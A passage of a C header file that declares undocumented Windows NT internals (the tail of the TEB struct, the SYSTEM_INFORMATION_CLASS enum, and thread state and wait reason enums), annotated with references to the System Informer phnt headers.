438 |     CHAR PlaceholderReserved[10];
439 | 
440 |     ULONG ProxiedProcessId;
441 |     ACTIVATION_CONTEXT_STACK ActivationStack;
442 | 
443 |     UCHAR WorkingOnBehalfTicket[8];
444 |     NTSTATUS ExceptionCode;
445 | 
446 |     PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
447 |     ULONG_PTR InstrumentationCallbackSp;
448 |     ULONG_PTR InstrumentationCallbackPreviousPc;
449 |     ULONG_PTR InstrumentationCallbackPreviousSp;
450 | #ifdef _WIN64
451 |     ULONG TxFsContext;
452 | #endif
453 | 
454 |     BOOLEAN InstrumentationCallbackDisabled;
455 | #ifdef _WIN64
456 |     BOOLEAN UnalignedLoadStoreExceptions;
457 | #endif
458 | #ifndef _WIN64
459 |     UCHAR SpareBytes[23];
460 |     ULONG TxFsContext;
461 | #endif
462 |     GDI_TEB_BATCH GdiTebBatch;
463 |     CLIENT_ID RealClientId;
464 |     HANDLE GdiCachedProcessHandle;
465 |     ULONG GdiClientPID;
466 |     ULONG GdiClientTID;
467 |     PVOID GdiThreadLocalInfo;
468 |     ULONG_PTR Win32ClientInfo[62];
469 |     PVOID glDispatchTable[233];
470 |     ULONG_PTR glReserved1[29];
471 |     PVOID glReserved2;
472 |     PVOID glSectionInfo;
473 |     PVOID glSection;
474 |     PVOID glTable;
475 |     PVOID glCurrentRC;
476 |     PVOID glContext;
477 | 
478 |     NTSTATUS LastStatusValue;
479 |     UNICODE_STRING StaticUnicodeString;
480 |     WCHAR StaticUnicodeBuffer[261];
481 | 
482 |     PVOID DeallocationStack;
483 |     PVOID TlsSlots[64];
484 |     LIST_ENTRY TlsLinks;
485 | 
486 |     PVOID Vdm;
487 |     PVOID ReservedForNtRpc;
488 |     PVOID DbgSsReserved[2];
489 | 
490 |     ULONG HardErrorMode;
491 | #ifdef _WIN64
492 |     PVOID Instrumentation[11];
493 | #else
494 |     PVOID Instrumentation[9];
495 | #endif
496 |     GUID ActivityId;
497 | 
498 |     PVOID SubProcessTag;
499 |     PVOID PerflibData;
500 |     PVOID EtwTraceData;
501 |     PVOID WinSockData;
502 |     ULONG GdiBatchCount;
503 | 
504 |     union
505 |     {
506 |         PROCESSOR_NUMBER CurrentIdealProcessor;
507 |         ULONG IdealProcessorValue;
508 |         struct
509 |         {
510 |             UCHAR ReservedPad0;
511 |             UCHAR ReservedPad1;
512 |             UCHAR ReservedPad2;
513 |             UCHAR IdealProcessor;
514 |         };
515 |     };
516 | 
517 |     ULONG GuaranteedStackBytes;
518 |     PVOID ReservedForPerf;
519 |     PVOID ReservedForOle; // tagSOleTlsData
520 |     ULONG WaitingOnLoaderLock;
521 |     PVOID SavedPriorityState;
522 |     ULONG_PTR ReservedForCodeCoverage;
523 |     PVOID ThreadPoolData;
524 |     PVOID* TlsExpansionSlots;
525 | #ifdef _WIN64
526 |     PVOID DeallocationBStore;
527 |     PVOID BStoreLimit;
528 | #endif
529 |     ULONG MuiGeneration;
530 |     ULONG IsImpersonating;
531 |     PVOID NlsCache;
532 |     PVOID pShimData;
533 |     ULONG HeapData;
534 |     HANDLE CurrentTransactionHandle;
535 |     PTEB_ACTIVE_FRAME ActiveFrame;
536 |     PVOID FlsData;
537 | 
538 |     PVOID PreferredLanguages;
539 |     PVOID UserPrefLanguages;
540 |     PVOID MergedPrefLanguages;
541 |     ULONG MuiImpersonation;
542 | 
543 |     union
544 |     {
545 |         USHORT CrossTebFlags;
546 |         USHORT SpareCrossTebBits : 16;
547 |     };
548 |     union
549 |     {
550 |         USHORT SameTebFlags;
551 |         struct
552 |         {
553 |             USHORT SafeThunkCall : 1;
554 |             USHORT InDebugPrint : 1;
555 |             USHORT HasFiberData : 1;
556 |             USHORT SkipThreadAttach : 1;
557 |             USHORT WerInShipAssertCode : 1;
558 |             USHORT RanProcessInit : 1;
559 |             USHORT ClonedThread : 1;
560 |             USHORT SuppressDebugMsg : 1;
561 |             USHORT DisableUserStackWalk : 1;
562 |             USHORT RtlExceptionAttached : 1;
563 |             USHORT InitialThread : 1;
564 |             USHORT SessionAware : 1;
565 |             USHORT LoadOwner : 1;
566 |             USHORT LoaderWorker : 1;
567 |             USHORT SkipLoaderInit : 1;
568 |             USHORT SkipFileAPIBrokering : 1;
569 |         };
570 |     };
571 | 
572 |     PVOID TxnScopeEnterCallback;
573 |     PVOID TxnScopeExitCallback;
574 |     PVOID TxnScopeContext;
575 |     ULONG LockCount;
576 |     LONG WowTebOffset;
577 |     PVOID ResourceRetValue;
578 |     PVOID ReservedForWdf;
579 |     ULONGLONG ReservedForCrt;
580 |     GUID EffectiveContainerId;
581 |     ULONGLONG LastSleepCounter; // Win11
582 |     ULONG SpinCallCount;
583 |     ULONGLONG ExtendedFeatureDisableMask;
584 | } TEB, * PTEB;
585 | 
586 | 
587 | 
588 | 
589 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1324
590 | typedef enum _SYSTEM_INFORMATION_CLASS
591 | {
592 |     SystemBasicInformation, // q: SYSTEM_BASIC_INFORMATION
593 |     SystemProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION
594 |     SystemPerformanceInformation, // q: SYSTEM_PERFORMANCE_INFORMATION
595 |     SystemTimeOfDayInformation, // q: SYSTEM_TIMEOFDAY_INFORMATION
596 |     SystemPathInformation, // not implemented
597 |     SystemProcessInformation, // q: SYSTEM_PROCESS_INFORMATION
598 |     SystemCallCountInformation, // q: SYSTEM_CALL_COUNT_INFORMATION
599 |     SystemDeviceInformation, // q: SYSTEM_DEVICE_INFORMATION
600 |     SystemProcessorPerformanceInformation, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION (EX in: USHORT ProcessorGroup)
601 |     SystemFlagsInformation, // q: SYSTEM_FLAGS_INFORMATION
602 |     SystemCallTimeInformation, // not implemented // SYSTEM_CALL_TIME_INFORMATION // 10
603 |     SystemModuleInformation, // q: RTL_PROCESS_MODULES
604 |     SystemLocksInformation, // q: RTL_PROCESS_LOCKS
605 |     SystemStackTraceInformation, // q: RTL_PROCESS_BACKTRACES
606 |     SystemPagedPoolInformation, // not implemented
607 |     SystemNonPagedPoolInformation, // not implemented
608 |     SystemHandleInformation, // q: SYSTEM_HANDLE_INFORMATION
609 |     SystemObjectInformation, // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION
610 |     SystemPageFileInformation, // q: SYSTEM_PAGEFILE_INFORMATION
611 |     SystemVdmInstemulInformation, // q: SYSTEM_VDM_INSTEMUL_INFO
612 |     SystemVdmBopInformation, // not implemented // 20
613 |     SystemFileCacheInformation, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache)
614 |     SystemPoolTagInformation, // q: SYSTEM_POOLTAG_INFORMATION
615 |     SystemInterruptInformation, // q: SYSTEM_INTERRUPT_INFORMATION (EX in: USHORT ProcessorGroup)
616 |     SystemDpcBehaviorInformation, // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege)
617 |     SystemFullMemoryInformation, // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION
618 |     SystemLoadGdiDriverInformation, // s (kernel-mode only)
619 |     SystemUnloadGdiDriverInformation, // s (kernel-mode only)
620 |     SystemTimeAdjustmentInformation, // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege)
621 |     SystemSummaryMemoryInformation, // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION
622 |     SystemMirrorMemoryInformation, // s (requires license value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) // 30
623 |     SystemPerformanceTraceInformation, // q; s: (type depends on EVENT_TRACE_INFORMATION_CLASS)
624 |     SystemObsolete0, // not implemented
625 |     SystemExceptionInformation, // q: SYSTEM_EXCEPTION_INFORMATION
626 |     SystemCrashDumpStateInformation, // s: SYSTEM_CRASH_DUMP_STATE_INFORMATION (requires SeDebugPrivilege)
627 |     SystemKernelDebuggerInformation, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION
628 |     SystemContextSwitchInformation, // q: SYSTEM_CONTEXT_SWITCH_INFORMATION
629 |     SystemRegistryQuotaInformation, // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege)
630 |     SystemExtendServiceTableInformation, // s (requires SeLoadDriverPrivilege) // loads win32k only
631 |     SystemPrioritySeperation, // s (requires SeTcbPrivilege)
632 |     SystemVerifierAddDriverInformation, // s (requires SeDebugPrivilege) // 40
633 |     SystemVerifierRemoveDriverInformation, // s (requires SeDebugPrivilege)
634 |     SystemProcessorIdleInformation, // q: SYSTEM_PROCESSOR_IDLE_INFORMATION (EX in: USHORT ProcessorGroup)
635 |     SystemLegacyDriverInformation, // q: SYSTEM_LEGACY_DRIVER_INFORMATION
636 |     SystemCurrentTimeZoneInformation, // q; s: RTL_TIME_ZONE_INFORMATION
637 |     SystemLookasideInformation, // q: SYSTEM_LOOKASIDE_INFORMATION
638 |     SystemTimeSlipNotification, // s: HANDLE (NtCreateEvent) (requires SeSystemtimePrivilege)
639 |     SystemSessionCreate, // not implemented
640 |     SystemSessionDetach, // not implemented
641 |     SystemSessionInformation, // not implemented (SYSTEM_SESSION_INFORMATION)
642 |     SystemRangeStartInformation, // q: SYSTEM_RANGE_START_INFORMATION // 50
643 |     SystemVerifierInformation, // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege)
644 |     SystemVerifierThunkExtend, // s (kernel-mode only)
645 |     SystemSessionProcessInformation, // q: SYSTEM_SESSION_PROCESS_INFORMATION
646 |     SystemLoadGdiDriverInSystemSpace, // s: SYSTEM_GDI_DRIVER_INFORMATION (kernel-mode only) (same as SystemLoadGdiDriverInformation)
647 |     SystemNumaProcessorMap, // q: SYSTEM_NUMA_INFORMATION
648 |     SystemPrefetcherInformation, // q; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation
649 |     SystemExtendedProcessInformation, // q: SYSTEM_PROCESS_INFORMATION
650 |     SystemRecommendedSharedDataAlignment, // q: ULONG // KeGetRecommendedSharedDataAlignment
651 |     SystemComPlusPackage, // q; s: ULONG
652 |     SystemNumaAvailableMemory, // q: SYSTEM_NUMA_INFORMATION // 60
653 |     SystemProcessorPowerInformation, // q: SYSTEM_PROCESSOR_POWER_INFORMATION (EX in: USHORT ProcessorGroup)
654 |     SystemEmulationBasicInformation, // q: SYSTEM_BASIC_INFORMATION
655 |     SystemEmulationProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION
656 |     SystemExtendedHandleInformation, // q: SYSTEM_HANDLE_INFORMATION_EX
657 |     SystemLostDelayedWriteInformation, // q: ULONG
658 |     SystemBigPoolInformation, // q: SYSTEM_BIGPOOL_INFORMATION
659 |     SystemSessionPoolTagInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION
660 |     SystemSessionMappedViewInformation, // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION
661 |     SystemHotpatchInformation, // q; s: SYSTEM_HOTPATCH_CODE_INFORMATION
662 |     SystemObjectSecurityMode, // q: ULONG // 70
663 |     SystemWatchdogTimerHandler, // s: SYSTEM_WATCHDOG_HANDLER_INFORMATION // (kernel-mode only)
664 |     SystemWatchdogTimerInformation, // q: SYSTEM_WATCHDOG_TIMER_INFORMATION // (kernel-mode only)
665 |     SystemLogicalProcessorInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION (EX in: USHORT ProcessorGroup)
666 |     SystemWow64SharedInformationObsolete, // not implemented
667 |     SystemRegisterFirmwareTableInformationHandler, // s: SYSTEM_FIRMWARE_TABLE_HANDLER // (kernel-mode only)
668 |     SystemFirmwareTableInformation, // SYSTEM_FIRMWARE_TABLE_INFORMATION
669 |     SystemModuleInformationEx, // q: RTL_PROCESS_MODULE_INFORMATION_EX
670 |     SystemVerifierTriageInformation, // not implemented
671 |     SystemSuperfetchInformation, // q; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation
672 |     SystemMemoryListInformation, // q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) // 80
673 |     SystemFileCacheInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation)
674 |     SystemThreadPriorityClientIdInformation, // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege)
675 |     SystemProcessorIdleCycleTimeInformation, // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup)
676 |     SystemVerifierCancellationInformation, // SYSTEM_VERIFIER_CANCELLATION_INFORMATION // name:wow64:whNT32QuerySystemVerifierCancellationInformation
677 |     SystemProcessorPowerInformationEx, // not implemented
678 |     SystemRefTraceInformation, // q; s: SYSTEM_REF_TRACE_INFORMATION // ObQueryRefTraceInformation
679 |     SystemSpecialPoolInformation, // q; s: SYSTEM_SPECIAL_POOL_INFORMATION (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0
680 |     SystemProcessIdInformation, // q: SYSTEM_PROCESS_ID_INFORMATION
681 |     SystemErrorPortInformation, // s (requires SeTcbPrivilege)
682 |     SystemBootEnvironmentInformation, // q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION // 90
683 |     SystemHypervisorInformation, // q: SYSTEM_HYPERVISOR_QUERY_INFORMATION
684 |     SystemVerifierInformationEx, // q; s: SYSTEM_VERIFIER_INFORMATION_EX
685 |     SystemTimeZoneInformation, // q; s: RTL_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege)
686 |     SystemImageFileExecutionOptionsInformation, // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege)
687 |     SystemCoverageInformation, // q: COVERAGE_MODULES s: COVERAGE_MODULE_REQUEST // ExpCovQueryInformation (requires SeDebugPrivilege)
688 |     SystemPrefetchPatchInformation, // SYSTEM_PREFETCH_PATCH_INFORMATION
689 |     SystemVerifierFaultsInformation, // s: SYSTEM_VERIFIER_FAULTS_INFORMATION (requires SeDebugPrivilege)
690 |     SystemSystemPartitionInformation, // q: SYSTEM_SYSTEM_PARTITION_INFORMATION
691 |     SystemSystemDiskInformation, // q: SYSTEM_SYSTEM_DISK_INFORMATION
692 |     SystemProcessorPerformanceDistribution, // q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION (EX in: USHORT ProcessorGroup) // 100
693 |     SystemNumaProximityNodeInformation, // q; s: SYSTEM_NUMA_PROXIMITY_MAP
694 |     SystemDynamicTimeZoneInformation, // q; s: RTL_DYNAMIC_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege)
695 |     SystemCodeIntegrityInformation, // q: SYSTEM_CODEINTEGRITY_INFORMATION // SeCodeIntegrityQueryInformation
696 |     SystemProcessorMicrocodeUpdateInformation, // s: SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION
697 |     SystemProcessorBrandString, // q: CHAR[] // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23
698 |     SystemVirtualAddressInformation, // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation
699 |     SystemLogicalProcessorAndGroupInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX (EX in: LOGICAL_PROCESSOR_RELATIONSHIP RelationshipType) // since WIN7 // KeQueryLogicalProcessorRelationship
700 |     SystemProcessorCycleTimeInformation, // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup)
701 |     SystemStoreInformation, // q; s: SYSTEM_STORE_INFORMATION (requires SeProfileSingleProcessPrivilege) // SmQueryStoreInformation
702 |     SystemRegistryAppendString, // s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // 110
703 |     SystemAitSamplingValue, // s: ULONG (requires SeProfileSingleProcessPrivilege)
704 |     SystemVhdBootInformation, // q: SYSTEM_VHD_BOOT_INFORMATION
705 |     SystemCpuQuotaInformation, // q; s: PS_CPU_QUOTA_QUERY_INFORMATION
706 |     SystemNativeBasicInformation, // q: SYSTEM_BASIC_INFORMATION
707 |     SystemErrorPortTimeouts, // SYSTEM_ERROR_PORT_TIMEOUTS
708 |     SystemLowPriorityIoInformation, // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION
709 |     SystemTpmBootEntropyInformation, // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation
710 |     SystemVerifierCountersInformation, // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION
711 |     SystemPagedPoolInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool)
712 |     SystemSystemPtesInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) // 120
713 |     SystemNodeDistanceInformation, // q: USHORT[4*NumaNodes] // (EX in: USHORT NodeNumber)
714 |     SystemAcpiAuditInformation, // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26
715 |     SystemBasicPerformanceInformation, // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation
716 |     SystemQueryPerformanceCounterInformation, // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1
717 |     SystemSessionBigPoolInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION // since WIN8
718 |     SystemBootGraphicsInformation, // q; s: SYSTEM_BOOT_GRAPHICS_INFORMATION (kernel-mode only)
719 |     SystemScrubPhysicalMemoryInformation, // q; s: MEMORY_SCRUB_INFORMATION
720 |     SystemBadPageInformation,
721 |     SystemProcessorProfileControlArea, // q; s: SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA
722 |     SystemCombinePhysicalMemoryInformation, // s: MEMORY_COMBINE_INFORMATION, MEMORY_COMBINE_INFORMATION_EX, MEMORY_COMBINE_INFORMATION_EX2 // 130
723 |     SystemEntropyInterruptTimingInformation, // q; s: SYSTEM_ENTROPY_TIMING_INFORMATION
724 |     SystemConsoleInformation, // q; s: SYSTEM_CONSOLE_INFORMATION
725 |     SystemPlatformBinaryInformation, // q: SYSTEM_PLATFORM_BINARY_INFORMATION (requires SeTcbPrivilege)
726 |     SystemPolicyInformation, // q: SYSTEM_POLICY_INFORMATION (Warbird/Encrypt/Decrypt/Execute)
727 |     SystemHypervisorProcessorCountInformation, // q: SYSTEM_HYPERVISOR_PROCESSOR_COUNT_INFORMATION
728 |     SystemDeviceDataInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION
729 |     SystemDeviceDataEnumerationInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION
730 |     SystemMemoryTopologyInformation, // q: SYSTEM_MEMORY_TOPOLOGY_INFORMATION
731 |     SystemMemoryChannelInformation, // q: SYSTEM_MEMORY_CHANNEL_INFORMATION
732 |     SystemBootLogoInformation, // q: SYSTEM_BOOT_LOGO_INFORMATION // 140
733 |     SystemProcessorPerformanceInformationEx, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // (EX in: USHORT ProcessorGroup) // since WINBLUE
734 |     SystemCriticalProcessErrorLogInformation,
735 |     SystemSecureBootPolicyInformation, // q: SYSTEM_SECUREBOOT_POLICY_INFORMATION
736 |     SystemPageFileInformationEx, // q: SYSTEM_PAGEFILE_INFORMATION_EX
737 |     SystemSecureBootInformation, // q: SYSTEM_SECUREBOOT_INFORMATION
738 |     SystemEntropyInterruptTimingRawInformation,
739 |     SystemPortableWorkspaceEfiLauncherInformation, // q: SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION
740 |     SystemFullProcessInformation, // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin)
741 |     SystemKernelDebuggerInformationEx, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX
742 |     SystemBootMetadataInformation, // 150
743 |     SystemSoftRebootInformation, // q: ULONG
744 |     SystemElamCertificateInformation, // s: SYSTEM_ELAM_CERTIFICATE_INFORMATION
745 |     SystemOfflineDumpConfigInformation, // q: OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2
746 |     SystemProcessorFeaturesInformation, // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION
747 |     SystemRegistryReconciliationInformation, // s: NULL (requires admin) (flushes registry hives)
748 |     SystemEdidInformation, // q: SYSTEM_EDID_INFORMATION
749 |     SystemManufacturingInformation, // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD
750 |     SystemEnergyEstimationConfigInformation, // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION
751 |     SystemHypervisorDetailInformation, // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION
752 |     SystemProcessorCycleStatsInformation, // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION (EX in: USHORT ProcessorGroup) // 160
753 |     SystemVmGenerationCountInformation,
754 |     SystemTrustedPlatformModuleInformation, // q: SYSTEM_TPM_INFORMATION
755 |     SystemKernelDebuggerFlags, // SYSTEM_KERNEL_DEBUGGER_FLAGS
756 |     SystemCodeIntegrityPolicyInformation, // q; s: SYSTEM_CODEINTEGRITYPOLICY_INFORMATION
757 |     SystemIsolatedUserModeInformation, // q: SYSTEM_ISOLATED_USER_MODE_INFORMATION
758 |     SystemHardwareSecurityTestInterfaceResultsInformation,
759 |     SystemSingleModuleInformation, // q: SYSTEM_SINGLE_MODULE_INFORMATION
760 |     SystemAllowedCpuSetsInformation,
761 |     SystemVsmProtectionInformation, // q: SYSTEM_VSM_PROTECTION_INFORMATION (previously SystemDmaProtectionInformation)
762 |     SystemInterruptCpuSetsInformation, // q: SYSTEM_INTERRUPT_CPU_SET_INFORMATION // 170
763 |     SystemSecureBootPolicyFullInformation, // q: SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION
764 |     SystemCodeIntegrityPolicyFullInformation,
765 |     SystemAffinitizedInterruptProcessorInformation, // (requires SeIncreaseBasePriorityPrivilege)
766 |     SystemRootSiloInformation, // q: SYSTEM_ROOT_SILO_INFORMATION
767 |     SystemCpuSetInformation, // q: SYSTEM_CPU_SET_INFORMATION // since THRESHOLD2
768 |     SystemCpuSetTagInformation, // q: SYSTEM_CPU_SET_TAG_INFORMATION
769 |     SystemWin32WerStartCallout,
770 |     SystemSecureKernelProfileInformation, // q: SYSTEM_SECURE_KERNEL_HYPERGUARD_PROFILE_INFORMATION
771 |     SystemCodeIntegrityPlatformManifestInformation, // q: SYSTEM_SECUREBOOT_PLATFORM_MANIFEST_INFORMATION // since REDSTONE
772 |     SystemInterruptSteeringInformation, // SYSTEM_INTERRUPT_STEERING_INFORMATION_INPUT // 180
773 |     SystemSupportedProcessorArchitectures, // p: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx
774 |     SystemMemoryUsageInformation, // q: SYSTEM_MEMORY_USAGE_INFORMATION
775 |     SystemCodeIntegrityCertificateInformation, // q: SYSTEM_CODEINTEGRITY_CERTIFICATE_INFORMATION
776 |     SystemPhysicalMemoryInformation, // q: SYSTEM_PHYSICAL_MEMORY_INFORMATION // since REDSTONE2
777 |     SystemControlFlowTransition, // (Warbird/Encrypt/Decrypt/Execute)
778 |     SystemKernelDebuggingAllowed, // s: ULONG
779 |     SystemActivityModerationExeState, // SYSTEM_ACTIVITY_MODERATION_EXE_STATE
780 |     SystemActivityModerationUserSettings, // SYSTEM_ACTIVITY_MODERATION_USER_SETTINGS
781 |     SystemCodeIntegrityPoliciesFullInformation,
782 |     SystemCodeIntegrityUnlockInformation, // SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION // 190
783 |     SystemIntegrityQuotaInformation,
784 |     SystemFlushInformation, // q: SYSTEM_FLUSH_INFORMATION
785 |     SystemProcessorIdleMaskInformation, // q: ULONG_PTR[ActiveGroupCount] // since REDSTONE3
786 |     SystemSecureDumpEncryptionInformation,
787 |     SystemWriteConstraintInformation, // SYSTEM_WRITE_CONSTRAINT_INFORMATION
788 |     SystemKernelVaShadowInformation, // SYSTEM_KERNEL_VA_SHADOW_INFORMATION
789 |     SystemHypervisorSharedPageInformation, // SYSTEM_HYPERVISOR_SHARED_PAGE_INFORMATION // since REDSTONE4
790 |     SystemFirmwareBootPerformanceInformation,
791 |     SystemCodeIntegrityVerificationInformation, // SYSTEM_CODEINTEGRITYVERIFICATION_INFORMATION
792 |     SystemFirmwarePartitionInformation, // SYSTEM_FIRMWARE_PARTITION_INFORMATION // 200
793 |     SystemSpeculationControlInformation, // SYSTEM_SPECULATION_CONTROL_INFORMATION // (CVE-2017-5715) REDSTONE3 and above.
794 |     SystemDmaGuardPolicyInformation, // SYSTEM_DMA_GUARD_POLICY_INFORMATION
795 |     SystemEnclaveLaunchControlInformation, // SYSTEM_ENCLAVE_LAUNCH_CONTROL_INFORMATION
796 |     SystemWorkloadAllowedCpuSetsInformation, // SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION // since REDSTONE5
797 |     SystemCodeIntegrityUnlockModeInformation,
798 |     SystemLeapSecondInformation, // SYSTEM_LEAP_SECOND_INFORMATION
799 |     SystemFlags2Information, // q: SYSTEM_FLAGS_INFORMATION
800 |     SystemSecurityModelInformation, // SYSTEM_SECURITY_MODEL_INFORMATION // since 19H1
801 |     SystemCodeIntegritySyntheticCacheInformation,
802 |     SystemFeatureConfigurationInformation, // SYSTEM_FEATURE_CONFIGURATION_INFORMATION // since 20H1 // 210
803 |     SystemFeatureConfigurationSectionInformation, // SYSTEM_FEATURE_CONFIGURATION_SECTIONS_INFORMATION
804 |     SystemFeatureUsageSubscriptionInformation, // SYSTEM_FEATURE_USAGE_SUBSCRIPTION_DETAILS
805 |     SystemSecureSpeculationControlInformation, // SECURE_SPECULATION_CONTROL_INFORMATION
806 |     SystemSpacesBootInformation, // since 20H2
807 |     SystemFwRamdiskInformation, // SYSTEM_FIRMWARE_RAMDISK_INFORMATION
808 |     SystemWheaIpmiHardwareInformation,
809 |     SystemDifSetRuleClassInformation,
810 |     SystemDifClearRuleClassInformation,
811 |     SystemDifApplyPluginVerificationOnDriver,
812 |     SystemDifRemovePluginVerificationOnDriver, // 220
813 |     SystemShadowStackInformation, // SYSTEM_SHADOW_STACK_INFORMATION
814 |     SystemBuildVersionInformation, // SYSTEM_BUILD_VERSION_INFORMATION
815 |     SystemPoolLimitInformation, // SYSTEM_POOL_LIMIT_INFORMATION (requires SeIncreaseQuotaPrivilege)
816 |     SystemCodeIntegrityAddDynamicStore,
817 |     SystemCodeIntegrityClearDynamicStores,
818 |     SystemDifPoolTrackingInformation,
819 |     SystemPoolZeroingInformation, // SYSTEM_POOL_ZEROING_INFORMATION
820 |     SystemDpcWatchdogInformation,
821 |     SystemDpcWatchdogInformation2,
822 |     SystemSupportedProcessorArchitectures2, // q: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx  // 230
823 |     SystemSingleProcessorRelationshipInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // (EX in: PROCESSOR_NUMBER Processor)
824 |     SystemXfgCheckFailureInformation,
825 |     SystemIommuStateInformation, // SYSTEM_IOMMU_STATE_INFORMATION // since 22H1
826 |     SystemHypervisorMinrootInformation, // SYSTEM_HYPERVISOR_MINROOT_INFORMATION
827 |     SystemHypervisorBootPagesInformation, // SYSTEM_HYPERVISOR_BOOT_PAGES_INFORMATION
828 |     SystemPointerAuthInformation, // SYSTEM_POINTER_AUTH_INFORMATION
829 |     SystemSecureKernelDebuggerInformation,
830 |     SystemOriginalImageFeatureInformation,
831 |     MaxSystemInfoClass
832 | } SYSTEM_INFORMATION_CLASS;
833 | 
834 | 
835 | 
836 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/phnt_ntdef.h#L59
837 | typedef LONG KPRIORITY, * PKPRIORITY;
838 | 
839 | 
840 | 
841 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntkeapi.h#L17
842 | typedef enum _KTHREAD_STATE
843 | {
844 |     Initialized,
845 |     Ready,
846 |     Running,
847 |     Standby,
848 |     Terminated,
849 |     Waiting,
850 |     Transition,
851 |     DeferredReady,
852 |     GateWaitObsolete,
853 |     WaitingForProcessInSwap,
854 |     MaximumThreadState
855 | } KTHREAD_STATE, * PKTHREAD_STATE;
856 | 
857 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntkeapi.h#L50
858 | typedef enum _KWAIT_REASON
859 | {
860 |     Executive,
861 |     FreePage,
862 |     PageIn,
863 |     PoolAllocation,
864 |     DelayExecution,
865 |     Suspended,
866 |     UserRequest,
867 |     WrExecutive,
868 |     WrFreePage,
869 |     WrPageIn,
870 |     WrPoolAllocation,
871 |     WrDelayExecution,
872 |     WrSuspended,
873 |     WrUserRequest,
874 |     WrEventPair,
875 |     WrQueue,
876 |     WrLpcReceive,
877 |     WrLpcReply,
878 |     WrVirtualMemory,
879 |     WrPageOut,
880 |     WrRendezvous,
881 |     WrKeyedEvent,
882 |     WrTerminated,
883 |     WrProcessInSwap,
